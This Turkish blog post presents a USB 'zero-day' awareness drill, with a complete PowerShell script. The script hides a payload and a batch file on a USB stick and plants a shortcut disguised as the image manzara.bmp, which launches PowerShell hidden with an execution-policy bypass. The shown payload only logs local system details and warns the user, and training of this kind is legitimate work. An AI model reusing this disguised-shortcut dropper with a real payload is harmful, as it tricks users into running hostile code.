Blog

USB Zero-Day Saldırı Simülasyonu

Günümüzde siber tehditler hızla çeşitlenip karmaşıklaşırken, hem kurumlar hem de bireyler için güvenlik açıklarına karşı hazırlıklı olmak artık kaçınılmaz bir gereklilik haline geldi. Özellikle “sıfır gün” (zero-day) saldırıları, henüz keşfedilmemiş ya da yamalanmamış güvenlik açıklarını hedef alarak çok ciddi zararlar verebiliyor. Bu tür saldırılar, savunma mekanizmalarını zorlayarak siber güvenlik alanında ayrı bir risk oluşturuyor.

USB cihazları ise kolay erişilebilirlikleri ve yaygın kullanımları nedeniyle saldırganların gözde saldırı yöntemlerinden biri. Bir USB belleği sadece küçük bir depolama aracı olarak görürken, aslında birçok tehlikeye kapı aralayabiliyoruz. İşte bu yüzden, USB zero-day saldırı simülasyonları çok önemli. Bu tür tatbikatlar sayesinde kurumlar, gerçek hayattaki saldırı senaryolarını deneyimleyerek savunma yeteneklerini test edebiliyor, zayıf noktalarını keşfedip önlemlerini geliştirebiliyorlar. Ayrıca teknik ekiplerin yanı sıra kullanıcıların da farkındalık seviyesini artırarak, daha proaktif bir siber güvenlik kültürünün oluşmasına katkı sağlıyor.

usb c type yeni standar 2.1
USB Zero Day

Kendi yazdığım PowerShell scriptiyle basit ama etkili bir senaryo hazırladım: USB bellekte sadece “manzara.bmp” isimli bir fotoğraf var. USB belleği taktığınızda, görünürde sadece “manzara.bmp” varmış gibi görünse de, aslında bu fotoğrafın ardında saklanan başka dosyalar gizlice devreye giriyor ve fark edilmeden sisteme zararlı komutlar enjekte ediliyor.

Kullanıcı sadece masum bir resme bakıyor sanırken, aslında sistemde tehlikeli bir işlem çoktan başlamış oluyor. Bu senaryo, USB cihazlarının ne kadar riskli olabileceğini gözler önüne seriyor ve bizlere “görünene aldanmamak” gerektiğini hatırlatıyor.

1. Adım : İnternet üzerinden JPG uzantılı beğendiğin manzara resmini bilgisayarına indir ve “Farklı Kaydet” diyerek manzara.bmp uzantısıyla kaydet.

MANZARA. JPG > MANZARA. bmp

2.Adım :  USB Simülasyonu Için Powershell ile Script Dosyası Oluşturma

Aşağıda verdiğim script’i metin belgesine kopyalayıp, dosya adı olarak “payload.ps1” ve kayıt türü olarak “Tüm Dosyalar” seçerek kaydedin.

# ================================================================
# Script: USB Zero-Day Simülasyon Tatbikat Aracı
# Açıklama : USB cihazına yerleştirilen görsel kısayolu ile
#            sistem bilgilerini loglayan tatbikat aracı
# Hazırlayan: Arzu Tufan – Siber Güvenlik Uzmanı
# Tarih     : 02.06.2025
# ================================================================

# Tatbikat payload içeriği
$payloadContent = @'
Add-Type -AssemblyName PresentationFramework

$sysinfo = Get-ComputerInfo | Select-Object CsName, OsName, OsVersion, WindowsProductName
$processes = Get-Process | Select-Object Id, ProcessName, CPU
$disks = Get-PSDrive -PSProvider FileSystem | Select-Object Name, Used, Free
$netAdapters = Get-NetAdapter | Select-Object Name, Status, LinkSpeed

$logPath = "$env:USERPROFILE\Desktop\USB_ZeroDay_Tatbikat_Log.txt"

@"
=== Sistem Bilgisi ===
$($sysinfo | Out-String)

=== Çalışan İşlemler ===
$($processes | Out-String)

=== Disk Durumu ===
$($disks | Out-String)

=== Ağ Adaptörleri ===
$($netAdapters | Out-String)

=== Hazırlayan ===
Arzu Tufan – Siber Güvenlik Uzmanı
Tarih: 02.06.2025
"@ | Out-File -FilePath $logPath -Encoding UTF8

[System.Windows.MessageBox]::Show("USB Zero-Day Simülasyonu: Sistem bilgileri loglandı.", "Tatbikat Uyarısı")
Start-Process notepad.exe $logPath
'@

# BAT dosyası içeriği
$batContent = '@echo off
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "%~dp0payload.ps1"
exit
'

# USB sürücüsünü tespit et (manzara.bmp içeren)
$usbDrive = Get-PSDrive -PSProvider FileSystem |
    Where-Object { Test-Path "$($_.Root)\manzara.bmp" } |
    Select-Object -First 1

if (-not $usbDrive) {
    Write-Host "manzara.bmp içeren USB bulunamadı."
    exit
}

$usbPath = $usbDrive.Root.TrimEnd('\')

# Dosya yolları
$payloadPath = "$usbPath\payload.ps1"
$batPath     = "$usbPath\run.bat"
$realImage   = "$usbPath\manzara.bmp"
$shortcutPath = "$usbPath\manzara.bmp.lnk"

# USB'de manzara.bmp varsa, diğer dosyaları oluştur
if (Test-Path $realImage) {
    # 1. Payload ve .bat dosyalarını yaz
    Set-Content -Path $payloadPath -Value $payloadContent -Encoding UTF8
    Set-Content -Path $batPath -Value $batContent -Encoding ASCII

    # 2. .lnk kısayolu oluştur
    $WshShell = New-Object -ComObject WScript.Shell
    $shortcut = $WshShell.CreateShortcut($shortcutPath)
    $shortcut.TargetPath = $batPath
    $shortcut.IconLocation = $realImage
    $shortcut.WorkingDirectory = $usbPath
    $shortcut.WindowStyle = 7
    $shortcut.Save()

    # 3. payload.ps1 ve run.bat dosyalarını gizle
    attrib +h $payloadPath
    attrib +h $batPath

    Write-Host "`n✅ Tatbikat dosyaları oluşturuldu ve gizlendi."
    Write-Host "🔗 Görünen tek dosya: manzara.bmp.lnk"
} else {
    Write-Host "manzara.bmp bulunamadı. Önce bu resmi USB'ye yerleştiriniz."
    exit
}

Hazırlamış olduğum payload.ps1 script’ini PowerShell’de “Run as Administrator” olarak çalıştırın.

Bu script otomatik olarak USB belleğinizde…

  • Script, USB’de manzara.bmp var mı diye kontrol eder.
  • Bulursa, aynı USB kök dizinine payload.ps1, run.bat ve manzara.bmp.lnk dosyalarını oluşturur.
  • payload.ps1 ve run.bat dosyalarını gizler (hidden yapar).
  • manzara.bmp.lnk dosyası ise kısayol olarak görünür.

Bilgisayara takılan USB bellek içerisindeki ‘manzara’ görseline tıklandığında, kullanıcıyı karşılayan bir uyarı ekranı aracılığıyla bu dosyanın bir Zero-Day saldırı simülasyonu olduğu ve arka planda sistem bilgilerini topladığı bilgisi iletilmektedir.

Sanal makinenin masaüstünde ‘USB_ZeroDay_Tatbikat_Log’ isimli bir metin dosyasının belirdiği görülüyor. USB_ZeroDay_Tatbikat_Log dosya içeriğinde ise sistem bilgilerinin loglandığını görülmektedir.

USB Zero-Day saldırı simülasyonunun amacı, hem teknik ekipler hem de son kullanıcılar açısından çeşitli güvenlik risklerini ortaya koymak ve bunlara karşı hazırlıklı olmayı sağlamaktır.

Bu örnek, USB tabanlı bir Zero-Day simülasyon tatbikatı olarak basit ama etkili bir örnektir.

İçeriği ise gerçek bir zararlı içermeyen, Zero-day benzeri davranışı senaryo olarak simüle eden, kullanıcı farkındalığına ve davranış analizine odaklı bir giriş seviye / temel düzeyde tatbikat aracıdır.

USB üzerinden gerçekleştirilebilecek saldırıların etkilerini güvenli bir şekilde test etmeye olanak tanıyan bu senaryo, kurumların siber güvenlik farkındalığını artırmak ve olası zafiyetleri önceden tespit etmek açısından değerli bir başlangıç noktasıdır.

İlgili Makaleler

2 Yorum

Bir yanıt yazın

Başa dön tuşu